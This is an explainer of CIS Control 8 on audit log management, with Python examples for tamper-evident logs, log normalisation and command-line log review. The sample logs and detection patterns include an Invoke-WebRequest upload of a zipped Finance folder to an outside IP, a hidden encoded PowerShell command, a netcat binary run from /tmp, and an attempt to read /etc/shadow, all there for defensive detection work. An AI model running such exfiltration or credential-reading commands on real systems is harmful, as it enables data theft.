Audit logs provide a rich source of data critical to preventing, detecting, understanding, and minimizing the impact of network or data compromise in a timely manner.
Log collection and regular reviews are useful for identifying baselines, establishing operational trends, and detecting abnormalities. In some cases, logs may be the only evidence of a successful attack.
CIS Control 8 emphasizes the need for centralized collection, storage, and standardization of audit logs to better coordinate log reviews. Some industries have regulatory bodies that require the collection, retention, and review of logs, so CIS Control 8 is not only important but, in some cases, mandatory.
The Control is composed of twelve Safeguards, mostly in the IG2 category, with Govern, Protect, or Detect security functions, that all organizations with enterprise assets should implement.
Audit logs should capture detailed information about (1) what event happened, (2) what system the event happened on, (3) what time the event happened, and (4) who caused the event to happen. Alerts should be set for suspicious or major events, such as users attempting to access resources without the appropriate privileges, or the execution of binaries that should not exist on a system.
Audit logs are also a target for attackers looking to cover their tracks, so audit logging must be configured to enforce access control and limit the users who can modify or delete logging data.
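Access control on the log store is the first line of defense against an attacker erasing their tracks; a complementary measure is to make the stored log tamper-evident, so that a modification or deletion that does slip through is at least detectable at review time. The following is an added example, not code from CIS or from the page's author: each entry commits to the SHA-256 hash of the previous entry, and `verify_chain` reports the index of the first entry whose link is broken. The record fields and the sample records are constructed for illustration.

```python
"""Tamper-evident audit log store (added example, not from the CIS Controls).

Each entry commits to the hash of the previous entry, so editing or removing an
entry in the middle of the chain breaks every later link. Record fields and the
sample records below are constructed for illustration.
"""
import hashlib
import json
from typing import Optional, Tuple

GENESIS = "0" * 64  # the hash "before" the first entry


def entry_hash(prev_hash: str, seq: int, record: dict) -> str:
    # Canonical JSON so the same record always produces the same hash.
    payload = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(f"{prev_hash}\n{seq}\n{payload}".encode()).hexdigest()


def append_entry(chain: list, record: dict) -> dict:
    """Append a record, linking it to the current head of the chain."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    seq = len(chain)
    entry = {"seq": seq, "record": record, "prev_hash": prev_hash,
             "hash": entry_hash(prev_hash, seq, record)}
    chain.append(entry)
    return entry


def verify_chain(chain: list, expected_head: Optional[str] = None) -> Tuple[bool, Optional[int]]:
    """Return (True, None) if intact, else (False, index of the first bad entry).

    expected_head is the last hash as recorded by an independent party (for
    example the central collector). Without it, silently deleting the newest
    entries is undetectable, because the remaining prefix is still consistent.
    """
    prev_hash = GENESIS
    for i, entry in enumerate(chain):
        if entry["seq"] != i or entry["prev_hash"] != prev_hash:
            return False, i
        if entry_hash(prev_hash, i, entry["record"]) != entry["hash"]:
            return False, i
        prev_hash = entry["hash"]
    if expected_head is not None and prev_hash != expected_head:
        return False, len(chain)  # tail was truncated or head is stale
    return True, None


# Constructed sample records covering what / where / when / who.
SAMPLE_RECORDS = [
    {"ts": "2024-03-02T10:15:03Z", "host": "web01", "user": "alice", "event": "login_success"},
    {"ts": "2024-03-02T10:16:40Z", "host": "web01", "user": "alice", "event": "sudo_denied"},
    {"ts": "2024-03-02T10:17:02Z", "host": "web01", "user": "alice", "event": "file_read",
     "path": "/etc/shadow"},
    {"ts": "2024-03-02T10:19:55Z", "host": "web01", "user": "alice", "event": "logout"},
]


def build_sample_chain() -> list:
    chain: list = []
    for record in SAMPLE_RECORDS:
        append_entry(chain, record)
    return chain


if __name__ == "__main__":
    chain = build_sample_chain()
    head = chain[-1]["hash"]  # imagine this was shipped to the collector
    print("intact:", verify_chain(chain, head))
    chain[1]["record"]["event"] = "sudo_ok"  # attacker rewrites the denial
    print("after edit:", verify_chain(chain, head))
    chain = build_sample_chain()
    del chain[-1]  # attacker drops the newest entry
    print("truncation, no anchor:", verify_chain(chain))
    print("truncation, anchored:", verify_chain(chain, head))
```

The chain only proves something if the current head hash is held somewhere the attacker cannot reach, which is one more reason to forward logs to a central store (Safeguard 8.9) rather than keep them only on the asset that produced them.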
The CIS Benchmarks, which are available for many product families, are best-practice security configuration guides that are mapped to the controls and walk you through configuration remediation step-by-step.
Key Takeaways for Control 8
An audit log management plan should at least implement processes to:
- Ensure that detailed, time-synchronized audit logs are collected across enterprise assets.
- Ensure that logs are stored in a centralized location and retained for a minimum of 90 days.
- Ensure audit log reviews are conducted on a weekly basis or more often to establish baselines and detect potential threats.
Safeguards for Control 8
8.1) Establish and Maintain an Audit Log Management Process
Description: Establish and maintain an audit log management process that defines the enterprise's logging requirements. At a minimum, address the collection, review, and retention of logs for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Notes: The security function associated with this safeguard is Govern. Being able to properly govern enterprise assets provides the opportunity to protect them by ensuring that audit logs are collected, reviewed, and maintained in a systematic and repeatable manner. Audit logs need to be complete and accurate; it may be necessary to schedule simulated events to verify that the desired logs are actually generated. Tools may be required to ingest and search logs, and log data may need to be normalized to enable quick and efficient analysis.
8.2) Collect Audit Logs
Description: Collect audit logs. Ensure that logging, per the enterprise’s log management process, has been enabled across enterprise assets.
Notes: The security function associated with this safeguard is Protect. It’s basic cyber hygiene and should be implemented by all enterprises.
8.3) Ensure Adequate Audit Log Storage
Description: Ensure that logging destinations maintain adequate storage to comply with the enterprise’s audit log management process.
Notes: The security function associated with this safeguard is Protect. Adequate storage at the logging destination protects enterprise assets by preserving log history long enough to meet the enterprise's audit and compliance requirements. If storage fills, new events are dropped or the oldest records are overwritten, and the evidence of an incident can be lost.
8.4) Standardize Time Synchronization
Description: Standardize time synchronization. Configure at least two synchronized time sources across enterprise assets where supported.
Notes: The security function associated with this safeguard is Protect. Consistently synchronized clocks are what make it possible to correlate events recorded on different assets and to establish the order in which they occurred; configuring two time sources avoids a single point of failure.
8.5) Collect Detailed Audit Logs
Description: Configure detailed audit logging for enterprise assets containing sensitive data. Include event source, date, username, timestamp, source addresses, destination addresses, and other useful elements that could assist in a forensic investigation.
Notes: The security function associated with this safeguard is Detect. Collecting verbose logs supports detection of abnormalities and data compromise, allows what happened during an event to be reconstructed, and helps establish the extent of the affected assets.
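Detailed logs only pay off if they can be reduced to the four questions asked earlier on this page (what, where, when, who) and then matched against alert rules such as the privilege-denial and unexpected-binary cases mentioned there. The following is an added example, not code from CIS or from the page's author: it normalizes two constructed log formats (a syslog-style line and a JSON event) into one schema, converts every timestamp to UTC so events from hosts reporting local time sort correctly, and alerts on the two event classes. The log lines, field names, and the list of expected binary directories are assumptions of this example.

```python
"""Normalize heterogeneous audit logs and alert on two event classes
(added example; the log lines below are constructed, not real captures).

Every event is reduced to what / where / when (UTC) / who. Alerts fire on
privilege denials and on execution of binaries outside expected directories.
"""
import json
import re
from datetime import datetime, timezone

# Constructed sample lines: a syslog-style sudo denial, a JSON process event
# from a host whose clock reports local time (UTC-5), a benign JSON process
# event, and a syslog-style SSH login.
SAMPLE_LOGS = [
    "2024-03-02T10:15:03+00:00 web01 sudo: alice : user NOT in sudoers ; TTY=pts/0 ; "
    "PWD=/home/alice ; USER=root ; COMMAND=/bin/cat /etc/shadow",
    '{"ts": "2024-03-02T05:15:09-05:00", "host": "db02", "user": "svc_backup", '
    '"event": "process_start", "exe": "/tmp/.x/nc", "src": "10.0.5.12", "dst": "203.0.113.7"}',
    '{"ts": "2024-03-02T10:16:00+00:00", "host": "db02", "user": "postgres", '
    '"event": "process_start", "exe": "/usr/bin/pg_dump"}',
    "2024-03-02T10:17:44+00:00 web01 sshd[2143]: Accepted publickey for bob from 10.0.2.4 port 51234 ssh2",
]

SYSLOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
SUDO_DENIED_RE = re.compile(r"^(?P<user>\S+) : user NOT in sudoers.*COMMAND=(?P<cmd>.*)$")
SSH_OK_RE = re.compile(r"^Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port")

# Assumed directories from which binaries are expected to run; anything else is flagged.
EXPECTED_BIN_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/")


def to_utc(ts: str) -> datetime:
    """Parse an ISO-8601 timestamp with offset and normalize it to UTC."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)


def normalize(line: str):
    """Map one raw line to {what, where, when, who, exe, src, dst}, or None if unrecognized."""
    if line.startswith("{"):
        raw = json.loads(line)
        return {"what": raw["event"], "where": raw["host"], "when": to_utc(raw["ts"]),
                "who": raw["user"], "exe": raw.get("exe"),
                "src": raw.get("src"), "dst": raw.get("dst")}
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    base = {"where": m["host"], "when": to_utc(m["ts"]), "exe": None, "src": None, "dst": None}
    if m["prog"] == "sudo":
        d = SUDO_DENIED_RE.match(m["msg"])
        if d:
            return {**base, "what": "privilege_denied", "who": d["user"], "exe": d["cmd"]}
    if m["prog"] == "sshd":
        s = SSH_OK_RE.match(m["msg"])
        if s:
            return {**base, "what": "auth_success", "who": s["user"], "src": s["src"]}
    return {**base, "what": m["prog"], "who": None}  # recognized format, unclassified message


def evaluate_alerts(events: list) -> list:
    """Return (host, user, reason) for every event that warrants an alert."""
    alerts = []
    for e in events:
        exe = e["exe"] or ""
        if e["what"] == "privilege_denied":
            alerts.append((e["where"], e["who"], "privilege_denied: " + exe))
        elif e["what"] == "process_start" and not exe.startswith(EXPECTED_BIN_DIRS):
            alerts.append((e["where"], e["who"], "unexpected_binary: " + exe))
    return alerts


def run(lines=SAMPLE_LOGS) -> list:
    """Normalize, order by UTC time, and evaluate alert rules."""
    events = [ev for ev in (normalize(l) for l in lines) if ev is not None]
    return evaluate_alerts(sorted(events, key=lambda ev: ev["when"]))


if __name__ == "__main__":
    for host, user, reason in run():
        print(f"ALERT {host} {user}: {reason}")
```

Note that the JSON event stamped 05:15:09 at UTC-5 sorts between the two syslog lines once normalized; without Safeguard 8.4 (synchronized time) and an explicit offset in every record, that ordering cannot be trusted.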
8.6) Collect DNS Query Audit Logs
Description: Collect DNS query audit logs on enterprise assets where appropriate and supported.
Notes: The security function associated with this safeguard is Detect. DNS query logs can help track down misconfigured hosts, as well as signs of an intrusion or attack and its source.
8.7) Collect URL Request Audit Logs
Description: Collect URL request audit logs on enterprise assets where appropriate and supported.
Notes: The security function associated with this safeguard is Detect.
8.8) Collect Command-Line Audit Logs
Description: Collect command-line audit logs. Example implementations include collecting logs from PowerShell, BASH, and remote administrative terminals.
Notes: The security function associated with this safeguard is Detect. Command-line logs provide the ability to detect unusual or threatening behavior at command consoles. Attackers often use a common set of commands from reconnaissance through exfiltration or impact.
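Because attackers tend to move through recognizable stages at the console, command-line logs are most useful when reviewed as sequences per user and host rather than as isolated commands. The following is an added example, not code from CIS or the page's author: it classifies constructed PowerShell and bash command-line records into recon, collection, and exfiltration stages and alerts when one user on one host goes from recon to exfiltration inside a time window, or runs an encoded PowerShell command. The log format, the command-to-stage patterns, and the window are assumptions of this example.

```python
"""Stage-based review of command-line audit logs (added example; the log lines
are constructed and the command-to-stage mapping is an assumption).
"""
import re
from datetime import datetime, timedelta

# Constructed lines: timestamp host user shell command...
SAMPLE_CMD_LOG = """\
2024-03-02T10:20:01Z ws17 alice powershell whoami /all
2024-03-02T10:20:30Z ws17 alice powershell Get-ADUser -Filter * -Properties memberOf
2024-03-02T10:23:10Z ws17 alice powershell Compress-Archive -Path C:\\Finance -DestinationPath C:\\Users\\Public\\f.zip
2024-03-02T10:25:42Z ws17 alice powershell Invoke-WebRequest -Uri https://203.0.113.7/up -Method Post -InFile C:\\Users\\Public\\f.zip
2024-03-02T10:30:00Z web01 bob bash id
2024-03-02T10:31:00Z web01 bob bash tail -f /var/log/nginx/access.log
2024-03-02T11:05:00Z db02 carol bash tar czf /tmp/db.tgz /var/lib/postgresql
2024-03-02T13:40:00Z db02 carol bash scp /tmp/db.tgz backup@10.0.9.2:/backups/
2024-03-02T10:40:00Z ws22 dave powershell powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgA
"""

# Ordered (stage, pattern) pairs; the first match wins.
STAGE_PATTERNS = [
    ("recon", re.compile(
        r"^(?:whoami|id|net\s+(?:user|group)|Get-ADUser|Get-ADGroupMember|ipconfig|ifconfig)(?:\s|$)", re.I)),
    ("collection", re.compile(r"^(?:Compress-Archive\s|tar\s+\S*c|zip\s|7z\s+a\s)", re.I)),
    ("exfiltration", re.compile(
        r"^(?:scp\s|curl\s.*\s-T\s|Invoke-WebRequest\s.*-Method\s+Post|nc\s)", re.I)),
]
# -EncodedCommand / -enc / -e followed by a base64-looking blob.
ENCODED_PS_RE = re.compile(r"-(?:EncodedCommand|enc|e)\s+[A-Za-z0-9+/=]{8,}", re.I)


def parse_cmd_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, shell, command = line.split(maxsplit=4)
        records.append({"when": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                        "host": host, "user": user, "shell": shell, "command": command})
    return records


def classify(command: str):
    """Return the attack stage a command maps to, or None."""
    for stage, pattern in STAGE_PATTERNS:
        if pattern.search(command):
            return stage
    return None


def review(records: list, window: timedelta = timedelta(minutes=30)) -> list:
    """Return (host, user, reason) alerts in time order."""
    alerts = []
    last_recon = {}  # (host, user) -> time of the most recent recon command
    for r in sorted(records, key=lambda rec: rec["when"]):
        key = (r["host"], r["user"])
        if ENCODED_PS_RE.search(r["command"]):
            alerts.append((r["host"], r["user"], "encoded_powershell"))
        stage = classify(r["command"])
        if stage == "recon":
            last_recon[key] = r["when"]
        elif stage == "exfiltration" and key in last_recon:
            if r["when"] - last_recon.pop(key) <= window:
                alerts.append((r["host"], r["user"], "recon_to_exfil"))
    return alerts


if __name__ == "__main__":
    for host, user, reason in review(parse_cmd_log(SAMPLE_CMD_LOG)):
        print(f"ALERT {host} {user}: {reason}")
```

In the sample, carol's `tar` followed by `scp` produces no alert because no reconnaissance preceded it and the gap is hours long; that is the point of correlating stages instead of alerting on every archive or copy command, which a backup job would trigger daily.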
8.9) Centralize Audit Logs
Description: Centralize, to the extent possible, audit log collection and retention across enterprise assets.
Notes: The security function associated with this safeguard is Detect. Centralizing audit logs will make collection, retention, and review simpler. Tools exist to ingest, normalize, and parse logs for efficient searching and analysis.
8.10) Retain Audit Logs
Description: Retain audit logs across enterprise assets for a minimum of 90 days.
Notes: The security function associated with this safeguard is Protect. Requiring log data to be retained for a defined period protects enterprise assets by keeping the history an investigation needs available and by satisfying audit or compliance requirements.
8.11) Conduct Audit Log Reviews
Description: Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly or more frequent basis.
Notes: The security function associated with this safeguard is Detect. It is not enough to just collect audit logs; this IG2 Safeguard is intended to detect unusual behavior through periodic log reviews.
8.12) Collect Service Provider Logs
Description: Collect service provider logs where supported. Example implementations include collecting authentication and authorization events, data creation and disposal events, and user management events.
Notes: The security function associated with this safeguard is Detect.
See how simple and effective security controls can create a framework that helps you protect your organization and data from known cyber-attack vectors by downloading the CIS Controls guide here.
Read more about the 18 CIS Controls here:
CIS Control 1: Inventory and Control of Enterprise Assets
CIS Control 2: Inventory and Control of Software Assets
CIS Control 3: Data Protection
CIS Control 4: Secure Configuration of Enterprise Assets and Software
CIS Control 5: Account Management
CIS Control 6: Access Control Management
CIS Control 7: Continuous Vulnerability Management
CIS Control 8: Audit Log Management
CIS Control 9: Email and Web Browser Protections
CIS Control 10: Malware Defenses
CIS Control 12: Network Infrastructure Management
CIS Control 13: Network Monitoring and Defense
CIS Control 14: Security Awareness and Skill Training
CIS Control 15: Service Provider Management
CIS Control 16: Application Software Security
Get Foundational Security with the CIS Controls Monitoring
Use CIS Controls to establish solid protection against the most common attacks and use Tripwire to provide coverage for the controls.